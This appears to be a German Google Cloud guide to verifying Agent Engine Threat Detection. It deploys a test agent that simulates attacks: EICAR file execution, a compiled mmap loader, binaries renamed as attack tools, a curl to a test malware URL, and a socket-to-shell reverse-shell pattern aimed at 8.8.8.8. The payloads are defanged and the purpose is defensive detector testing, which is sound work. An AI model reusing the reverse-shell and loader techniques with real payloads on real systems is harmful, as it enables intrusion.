Auf dieser Seite wird erläutert, wie Sie prüfen können, ob die Agent Engine-Bedrohungserkennung funktioniert, indem Sie Detektoren auslösen und auf Ergebnisse prüfen. Die Agent Engine-Bedrohungserkennung ist ein integrierter Dienst von Security Command Center.
Hinweis
Wenn Sie potenzielle Bedrohungen für Ihre Vertex AI Agent Engine-Agents erkennen möchten, muss der Dienst Agent Engine-Bedrohungserkennung aktiviert sein in Security Command Center.
Umgebung einrichten
Wenn Sie die Agent Engine-Bedrohungserkennung testen möchten, richten Sie einen Demo-Agent ein, der schädliche Aktivitäten simuliert.
Projekt erstellen und Shell aktivieren
Wählen Sie ein Google Cloud Projekt für Tests aus oder erstellen Sie eines.
Zum Testen von Detektoren können Sie die Google Cloud Console und Cloud Shell verwenden.
Rufen Sie die Google Cloud Console auf.
Wählen Sie das Projekt aus, das Sie testen möchten.
Klicken Sie auf Cloud Shell aktivieren.
Sie können die Testanleitung auch über eine lokale Shell ausführen.
Vertex AI Agent Engine einrichten
Wenn Sie Vertex AI Agent Engine in diesem Projekt noch nicht verwendet haben, richten Sie die Vertex AI Agent Engine Umgebung ein, bevor Sie beginnen. Notieren Sie sich den Namen des von Ihnen erstellten Cloud Storage-Staging-Buckets. Wir empfehlen außerdem, die Vertex AI Agent Engine Schnellstartanleitung zu lesen, um zu erfahren, wie Sie einen Agent mit dem Vertex AI SDK entwickeln und bereitstellen.
Testskript erstellen
Sie erstellen mehrere Dateien, die zum Bereitstellen eines neuen Agents für Tests verwendet werden. Verwenden Sie dazu einen Texteditor wie nano.
Erstellen Sie eine neue Datei mit dem Namen
requirements.txtund dem folgenden Inhalt.google-cloud-aiplatform[agent_engines] google-adk google-genai aiohttp cloudpickle pydanticErstellen Sie eine neue leere Datei mit dem Namen
installation_scripts/install.sh. Für einige Tests muss dieser Datei Inhalt hinzugefügt werden.Erstellen Sie eine neue Datei mit dem Namen
main.pyund dem folgenden Inhalt. Ersetzen Sie die VariablenPROJECT_ID,LOCATIONundSTAGING_BUCKET. Der Name des Staging-Buckets muss das Präfixgs://enthalten.import asyncio import os import subprocess import socket import vertexai from vertexai import Client, agent_engines from google.adk.agents import llm_agent from google.adk.sessions.in_memory_session_service import InMemorySessionService # Replace with your own project, location, and staging bucket. LOCATION = "LOCATION" PROJECT_ID = "PROJECT_ID" # Staging bucket must have gs:// prefix STAGING_BUCKET = "STAGING_BUCKET" client = Client(project=PROJECT_ID, location=LOCATION) def _run_command(args, **kwargs): output = f"Called {' '.join(args)}\n" try: res = subprocess.run(args, capture_output=True, text=True, **kwargs) if res.stdout: output += f"Result: {res.stdout.strip()}\n" if res.stderr: output += f"Error: {res.stderr.strip()}\n" except subprocess.TimeoutExpired: output += "Command timed out as expected." return output # Tool to simulate threats. The function body will be replaced for individual # detector tests. def threat_detection_test(): output = _run_command(["sleep", "60"]) output += _run_command(["echo", "this is a fake threat"]) output += _run_command(["sleep", "10"]) return output root_agent = llm_agent.Agent( model="gemini-2.5-flash", name="threat_detection_test_agent", description="Runs threat detection test.", instruction=""" You are an agent that runs a threat detection test using a fake malicious command. """, tools=[threat_detection_test], ) async def main(): vertexai.init( project=PROJECT_ID, location=LOCATION, staging_bucket=STAGING_BUCKET, ) app = agent_engines.AdkApp( agent=root_agent, session_service_builder=InMemorySessionService ) remote_agent = client.agent_engines.create( agent=app, config={ "display_name": "scc_threat_test_agent", "identity_type": vertexai.types.IdentityType.AGENT_IDENTITY, "requirements": [ "google-cloud-aiplatform[agent_engines,adk]", "cloudpickle", "pydantic", ], "staging_bucket": STAGING_BUCKET, "extra_packages": [ "installation_scripts/install.sh", ], }, ) print("Deployed agent: ", remote_agent.api_resource.name) try: async for event in remote_agent.async_stream_query( user_id="threat_detection_tester", message="Run the threat detection test", ): print(event) finally: client.agent_engines.delete(name=remote_agent.api_resource.name, force=True) if __name__ == "__main__": asyncio.run(main())
Virtuelle Umgebung einrichten
Erstellen und aktivieren Sie eine virtuelle Python-Umgebung.
python3 -m venv env source env/bin/activateInstallieren Sie die erforderlichen Abhängigkeiten in der virtuellen Umgebung.
pip install -r requirements.txt
Skript testen
Führen Sie das Skript in der virtuellen Umgebung mit python3 main.py aus.
Es dauert einige Minuten, bis der Test-Agent erstellt, bereitgestellt und ausgeführt wird.
Das Skript gibt den Ressourcennamen des bereitgestellten Agents und einige JSON-Objekte aus, darunter eine LLM-Antwort und andere Metadaten. Wenn in dieser Phase Berechtigungs- oder Bereitstellungsfehler auftreten, finden Sie unter Fehlerbehebung weitere Informationen zu den nächsten Schritten.
Detektoren testen
Wenn Sie die Detektoren der Agent Engine-Bedrohungserkennung testen möchten, ersetzen Sie den Code in der Funktion threat_detection_test durch Code, der einen Angriff simuliert. Es kann lange dauern, bis das Skript den Agent bereitstellt und abfragt. Um die Tests zu beschleunigen, können Sie den Inhalt mehrerer dieser Funktionen kombinieren.
Ausführung: Hinzugefügtes schädliches Binärprogramm ausgeführt
Ersetzen Sie die Funktion threat_detection_test im Testskript und führen Sie das Testskript aus.
def threat_detection_test():
output = _run_command(["sleep", "60"])
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
output += _run_command(["touch", "/tmp/test_mal_file"])
with open("/tmp/test_mal_file", "w") as f:
f.write(eicar)
output += _run_command(["chmod", "700", "/tmp/test_mal_file"])
output += _run_command(["sh", "-c", "/tmp/test_mal_file"])
output += _run_command(["sleep", "10"])
return output
Ausführung: Hinzugefügte schädliche Bibliothek geladen
Ersetzen Sie die Funktion threat_detection_test im Testskript und führen Sie das Testskript aus. Möglicherweise wird vom Vertex AI SDK ein Fehler beim Parsen der Antwort angezeigt, aber das Ergebnis wird trotzdem generiert.
def threat_detection_test():
output = _run_command(["sleep", "60"])
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
with open("/tmp/test_mal_lib", "w") as f:
f.write(eicar)
with open("/tmp/loader.c", "w") as f:
f.write("""
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
int fd = open(argv[1], O_RDONLY);
struct stat sb;
fstat(fd, &sb);
void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
write(1, addr, sb.st_size);
munmap(addr, sb.st_size);
close(fd);
return 0;
}
""")
output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
output += _run_command(["/tmp/loader", "/tmp/test_mal_lib"])
output += _run_command(["sleep", "10"])
return output
Ausführung: Container-Escape
Ersetzen Sie die Funktion threat_detection_test im Testskript und führen Sie das Testskript aus.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/ls", "/tmp/botb-linux-amd64"])
output += _run_command(["chmod", "700", "/tmp/botb-linux-amd64"])
output += _run_command(["/tmp/botb-linux-amd64", "-autopwn"])
output += _run_command(["sleep", "10"])
return output
Ausführung: Kubernetes Attack Tool Execution
Ersetzen Sie die Funktion threat_detection_test im Testskript und führen Sie das Testskript aus.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/ls", "/tmp/amicontained"])
output += _run_command(["/tmp/amicontained"])
output += _run_command(["sleep", "10"])
return output
Ausführung: Ausführung eines lokalen Ausspähtools
Ersetzen Sie die Funktion threat_detection_test im Testskript und führen Sie das Testskript aus.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/ls", "/tmp/linenum.sh"])
output += _run_command(["/tmp/linenum.sh"])
output += _run_command(["sleep", "10"])
return output
Ausführung: Geändertes schädliches Binärprogramm ausgeführt
Replace the `threat_detection_test` function in the test script, and then run the
test script.
```python
def threat_detection_test():
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
output = _run_command(["sleep", "60"])
output += _run_command(["chmod", "-R", "777", "/code"])
with open("/code/entrypoint.sh", "w") as f:
f.write(eicar)
output += _run_command(["chmod", "700", "/code/entrypoint.sh"]) output += _run_command(["sh", "-c", "/code/entrypoint.sh"]) output += _run_command(["sleep", "10"]) return output ```
Ausführung: Geänderte schädliche Bibliothek geladen
Ersetzen Sie die Funktion threat_detection_test im Testskript und führen Sie das Testskript aus.
def threat_detection_test():
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
output = _run_command(["sleep", "60"])
output += _run_command(["chmod", "-R", "777", "/code"])
with open("/code/entrypoint.sh", "w") as f:
f.write(eicar)
with open("/tmp/loader.c", "w") as f:
f.write("""
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
int fd = open(argv[1], O_RDONLY);
struct stat sb;
fstat(fd, &sb);
void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
write(1, addr, sb.st_size);
munmap(addr, sb.st_size);
close(fd);
return 0;
}
""")
output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
output += _run_command(["/tmp/loader", "/code/entrypoint.sh"])
output += _run_command(["sleep", "10"])
return output
Schädliche URL beobachtet
Aktualisieren Sie die Datei installation_scripts/install.sh mit dem folgenden Inhalt.
#!/bin/bash
apt-get install -y curl --no-install-recommends
Ersetzen Sie die Funktion threat_detection_test im Testskript und führen Sie das Testskript aus.
def threat_detection_test():
url = "https://testsafebrowsing.appspot.com/s/malware.html"
output = _run_command(["sleep", "60"])
output += _run_command(["curl", url])
output += _run_command(["sleep", "10"])
return output
Reverse Shell
Ersetzen Sie die Funktion threat_detection_test im Testskript und führen Sie das Testskript aus.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/echo", "/tmp/sh"])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("8.8.8.8", 53))
subprocess.run(["/tmp/sh"], stdin=s, stdout=s, stderr=s, timeout=5)
output += _run_command(["sleep", "10"])
return output
Nächste Schritte
- Weitere Informationen zur Agent Engine-Bedrohungserkennung.
- Informationen zur Verwendung der Agent Engine-Bedrohungserkennung .